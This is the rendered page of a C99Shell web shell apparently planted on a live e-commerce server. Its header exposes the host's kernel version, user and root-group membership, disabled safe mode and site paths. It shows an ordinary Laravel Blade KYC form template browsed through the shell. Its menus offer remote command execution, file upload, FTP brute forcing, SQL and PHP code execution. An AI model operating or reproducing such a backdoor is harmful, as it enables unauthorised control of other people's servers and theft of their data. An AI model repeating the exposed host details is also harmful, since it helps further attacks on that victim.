!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/FormBuilder/Resources/views/kyc/   drwxr-xr-x
Free 26.24 GB of 117.98 GB (22.24%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     sub-edit.blade.php (1.82 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('formbuilder::vendor-layout')

@section('page_title', __('Edit KYC Submission'))

@section('content')
    <div class="list-container">
        <div class="card">
            <div class="card-header">
                <h5><a href="#">{{ __('Edit My KYC Data') }}</a></h5>
            </div>
            <div class="card-body px-4">
                <div class="card-block pt-2 px-0">
                    <div class="col-sm-12">
                        <form class="kycFormAdmin" action="{{ route('kyc.user.update', $submission->id) }}" method="POST" id="submitForm"
                            enctype="multipart/form-data">
                            @csrf
                            @method('PUT')

                            <div class="card-body px-0">
                                <div id="fb-render"></div>
                            </div>

                            <div class="card-footer px-0">
                                <button type="submit" class="btn custom-btn-submit confirm-form" data-form="submitForm"
                                    data-message="{{ __('Submit update to your entry for :x ?', ['x' => $submission?->form?->name]) }}">
                                     {{ __('Save') }}
                                </button>
                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </div>
    @include('admin.layouts.includes.delete-modal')
@endsection

@push(config('formbuilder.layout_js_stack', 'scripts'))
    <script type="text/javascript">
        window._form_builder_content = {!! json_encode($submission?->form?->form_builder_json) !!}
    </script>
    <script src="{{ asset('Modules/FormBuilder/Resources/assets/js/render-form.min.js') }}" defer></script>
@endpush

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0086 ]--